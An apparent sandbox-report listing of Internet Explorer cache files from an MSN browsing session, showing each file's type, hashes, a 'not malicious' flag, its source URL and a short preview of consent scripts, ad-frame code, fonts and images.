                                                                                                                                                                                                  Preview: ......JFIF....................................................!...!.1&""&18/-/8D==DVQVpp.......................+.!.!.+A(/((/(A9E848E9gQGGQgwd^dw................7...............4....................................................................PQ(p88.....8..9.'....As8.+..p88....c.......pp.5.......E\..........Q(......(p8....).....+88..G{;'.V(.pT.5....Q8........(.j...C.......-..."..K..a:y.\p..888......."v..Qe....*.d*..U.....'\.\...G..8..,.r.F.T..S*.Hw4Z8........:...G3..b.......nyV.u...P.!w..I9.... ..T..w.ZPP.....A.O..._.g..t.].$...!sXc..\.L.p9<.O>c..g....\..s...w..=.'0Y.Z...@pB...PZ...n|..p((.T....z...c.bn..Nf.5 .l..`.D1..X.o#..7\.....A...t...x..N.S..#.AA......1g. i.....W;...(|.e.^.1...b.Np.O.@.(p4...DXj...,.w....,h.&.n..i.ll...|....4I.8.#ERq..J....$iD..R..f...{n].n.^L...2#..MQi."..yF.m1Y..8....J.%M..0.I.c(.i.....3..k0..e..9.2..v&.q.[I.P~..r.p.T....k....j.5....;..O...S..x....w.E..0.;5..=.7f/........R&....=...Z.f...z,.".{^...9...^.<.-u...M.+|N.w....Q.....vS....Z.z....
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):180232
                                                                                                                                                                                                  Entropy (8bit):5.115010741936028
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
                                                                                                                                                                                                  MD5:EC3D53697497B516D3A5764E2C2D2355
                                                                                                                                                                                                  SHA1:0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
                                                                                                                                                                                                  SHA-256:2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
                                                                                                                                                                                                  SHA-512:CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                                                                                                                                  Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):381585
                                                                                                                                                                                                  Entropy (8bit):5.4850020419702625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4wM9Tw5qIZvbBH0m9Z3GCVvgz56Cu1b3sFyvrIW:CIZvdP3GCVvg4xVcFUrIW
                                                                                                                                                                                                  MD5:422576D28DF35AC2A2D0D3D6D5A9BB6E
                                                                                                                                                                                                  SHA1:0E5654DAF140FF185953856CF7232A40900B7B7E
                                                                                                                                                                                                  SHA-256:40D94398B8185C252B91D32C9531A63DEE4CA86ACB67C6A52DD96C9620B7F403
                                                                                                                                                                                                  SHA-512:E04962FD451100CC86D9C7D3FDBD68F1AB0AFE7CEC2C9D1F0F5304FBBDE914B12E93DAB3F4FDF0470EE7687B4217BE36AB812DC690114F486F265BB882E5A855
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                  Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\medianet[2].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):381585
                                                                                                                                                                                                  Entropy (8bit):5.484953674127127
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4wM9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bHsFyvrIW:CIZvdP3GCVvg4xVMFUrIW
                                                                                                                                                                                                  MD5:C893C88F9BB10DB97560F56A72C3DAA9
                                                                                                                                                                                                  SHA1:DAF57BEF6D57F4B33EC1AAA761C949B1A43724AE
                                                                                                                                                                                                  SHA-256:91A1EB2E9351ECD347107CABD957CAAEA2DB866E9F6C33FE308DD5A207877A1C
                                                                                                                                                                                                  SHA-512:5399735B80B86D47D8C7F7431C3797B617472AFA739C53EE96634A91488F0560287A4FEC2B0B27F2054944171060A1B27DCA1D9FDCCA6C1CCD90C13DEBFB726C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                  Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):372457
                                                                                                                                                                                                  Entropy (8bit):5.219562494722367
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
                                                                                                                                                                                                  MD5:DA186E696CD78BC57C0854179AE8704A
                                                                                                                                                                                                  SHA1:03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
                                                                                                                                                                                                  SHA-256:F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
                                                                                                                                                                                                  SHA-512:4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
                                                                                                                                                                                                  Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otSDKStub[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):12814
                                                                                                                                                                                                  Entropy (8bit):5.302802185296012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pQp/Oc/tyWocJgjgh7kjj3Uz5BpHfkmZqWov:+RbJgjjjaXHfkmvov
                                                                                                                                                                                                  MD5:EACEA3C30F1EDAD40E3653FD20EC3053
                                                                                                                                                                                                  SHA1:3B4B08F838365110B74350EBC1BEE69712209A3B
                                                                                                                                                                                                  SHA-256:58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
                                                                                                                                                                                                  SHA-512:6E30018933A65EE19E0C5479A76053DE91E5C905DA800DFA7D0DB2475C9766B632F91DE8CC9BD6B90C2FBC4861B50879811EE43D465E5C5434943586B1CC47F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
                                                                                                                                                                                                  Preview: var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBannerSDKDependency=function(
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otTCF-ie[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):102879
                                                                                                                                                                                                  Entropy (8bit):5.311489377663803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                  MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                  SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                  SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                  SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                                                                                                                                                                                                  Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\41-0bee62-68ddb2ab[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                  MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                  SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                  SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                  SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\4996b9[1].woff
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                                                                                                                                                                                                  Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\755f86[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):390
                                                                                                                                                                                                  Entropy (8bit):7.173321974089694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZ/SlkR7+RGjVjKM4H56b6z69eG3AXGxQm+cISwADBOwIaqOTp:6v/71IkR7ZjKHHIr8GxQJcISwy0W9
                                                                                                                                                                                                  MD5:D43625E0C97B3D1E78B90C664EF38AC7
                                                                                                                                                                                                  SHA1:27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896
                                                                                                                                                                                                  SHA-256:EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
                                                                                                                                                                                                  SHA-512:F2D153F11DC523E5F031B9AA16AA0AB1CCA8BB7267E8BF4FFECFBA333E1F42A044654762404AA135BD50BC7C01826AFA9B7B6F28C24FD797C4F609823FA457B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                                                                                                                                                                                                  Preview: .PNG........IHDR..............w=....MIDATH.c...?.6`hhx.......??........g.&hbb....... .R.R.K...x<..w..#!......O ....C..F___x2.....?...y..srr2...1011102.F.(.......Wp1qqq...6mbD..H....=.bt.....,.>}b.....r9........0.../_.DQ....Fj..m....e.2{..+..t~*...z.Els..NK.Z.............e....OJ.... |..UF.>8[....=...;/.............0.....v...n.bd....9.<.Z.t0......T..A...&....[......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\87e5c478-82d7-43e3-8254-594bbfda55c7[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):65009
                                                                                                                                                                                                  Entropy (8bit):7.978070488745874
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:9FPgE3ptlMp+ZlzOaTc5+vRDXjHyqhLhZa:9FPN37+p+ZHTc0vBjhLO
                                                                                                                                                                                                  MD5:7C62F2F02EF85B35216972F6294E279D
                                                                                                                                                                                                  SHA1:C4A6E45B4EDC3B8E14B78D78EBA891B20D7B10DD
                                                                                                                                                                                                  SHA-256:BC9E5E2000EE4C67C13331AAEF6B085ACC2280A64AA4AD4AFE23FF47F6F527AF
                                                                                                                                                                                                  SHA-512:8BB9BE0055FE514818F158B8E037C6B0ADED54F6E81066A955DD85EA2A0D2ECEE01A584A48C8DE46660F789743DBA6D6B0F440AD6BA8AF4D664139910311F8CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://cvision.media.net/new/300x300/3/88/228/173/87e5c478-82d7-43e3-8254-594bbfda55c7.jpg?v=9
                                                                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................K.........................!...1.."AQa..#2q.....$BR...3..%4Cb..r.T..&7DSds...................................@.....................!...1A.Q."aq2....B...#R....3b...$4Cr.Scs.............?.y.>W..++J..J..}...;...]...@N. kl6......%.....vI)[....H......m.k.?.~.X........v...........i...I....AG..L......w{..h..1.|.....0.#A,.@..a..._...o~'..W../..sH3S..%z....j.@WS2.&r..`@.B.=..q1...0.f.L=......]..~..~..?...ig..\dm`...P.....+M-a!U.X....j...Y..b...J._...Sb..@....'c.2v...d...-2T2...m".D..4..#.{.Y..6./...^-..!.1.2..{.Mw`~.o..Q30.R.o.c........s.K.....y<...nd.6 .....^z.Y-CJ.^C.d.V..h.,;.'.........g>.')..........w%...I!.l....z...Z......EXdR./hu...!.+x......$.A....'.t.\...HS..`.]..7..zo.3.`.[...........'*.X......k.s1./.kD.Xg.r...e.Qv.....y.s..=c....V*.-[..;.....o....\..*.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAuTnto[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):801
                                                                                                                                                                                                  Entropy (8bit):7.591962750491311
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:U/6yrupdmd6hHb/XvxQfxnSc9gjo2EX9TM0H:U/6yruzFDX6oDBY+m
                                                                                                                                                                                                  MD5:BB8DFFDE8ED5C13A132E4BD04827F90B
                                                                                                                                                                                                  SHA1:F86D85A9866664FC1B355F2EC5D6FCB54404663A
                                                                                                                                                                                                  SHA-256:D2AAD0826D78F031D528725FDFC71C1DBAA21B7E3CCEEAA4E7EEFA7AA0A04B26
                                                                                                                                                                                                  SHA-512:7F2836EA8699B4AFC267E85A5889FB449B4C629979807F8CBAD0DDED7413D4CD1DBD3F31D972609C6CF7F74AF86A8F8DDFE10A6C4C1B1054222250597930555F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAuTnto.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O].[H.a...s..k.x..$....L...A.(T.Y....S$T....E.J.EO.(=..RB^..{..4..M...^f/3.o..?,..|...9.s>...E.]rhj2.4....G.T"..!r.Th.....B..s.o.!...S...bT.81.y.Y....o...O.?.Z..v..........#h*;.E........)p.<.....'.7.*{.;.....p8...:.. ).O..c!.........5...KS..1....08..T..K..WB.Ww.V....=.)A.....sZ..m..e..NYW...E... Z].8Vt...ed.m..u......|@...W...X.d...DR..........007J.q..T.V./..2&Wgq..pB..D....+...N.@e.......i..:.L...%....K..d..R..........N.V........$.......7..3.....a..3.1...T.`.]...T{.......).....Q7JUUlD....Y....$czVZ.H..SW$.C......a...^T......C..(.;]|,.2..;.......p..#.e..7....<..Q...}..G.WL,v.eR...Y..y.`>.R.L..6hm.&,...5....u..[$_.t1.f...p..( .."Fw.I...'.....%4M..._....[.......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14hq0P[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):14112
                                                                                                                                                                                                  Entropy (8bit):7.839364256084609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7EIqipbU3NAAJ8QVoqHDzjEfE7Td4Tb67Bx/J5e8H0V1HB:7EIqZT5DMQT+TEf590VT
                                                                                                                                                                                                  MD5:A654465EC3B994F316791CAFDE3F7E9C
                                                                                                                                                                                                  SHA1:694A7D7E3200C3B1521F5469A3D20049EE5B6765
                                                                                                                                                                                                  SHA-256:2A10D6E97830278A13CD51CA51EC01880CE8C44C4A69A027768218934690B102
                                                                                                                                                                                                  SHA-512:9D12A0F8D9844F7933AA2099E8C3D470AD5609E6542EC1825C7EEB64442E0CD47CDEE15810B23A9016C4CEB51B40594C5D54E47A092052CC5E3B3D7C52E9D607
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ii(....(.h........Z(....JZ.)i(....(.......(.......(....J...+h...@....+...e.9...V..'."!.@....|......n...@My..w9;.5I...@....L..k...w2.'...M8)4..>.u9..5U.w9,M(....!E..!.[.5<v.?AV..s...VS....E5v........Q.^jwp*3&MJrf..J..|p...n .j..qW#.5w.)&.&..E^..*..."..T.......y.U.4.IK.sK.ooj.....Z..3j...".)..c..~... .RqL...lcym..R..gTa..a9.+....5-.W'.T@.N.8"...f.:....J.6.r.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1ardZ3[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):481
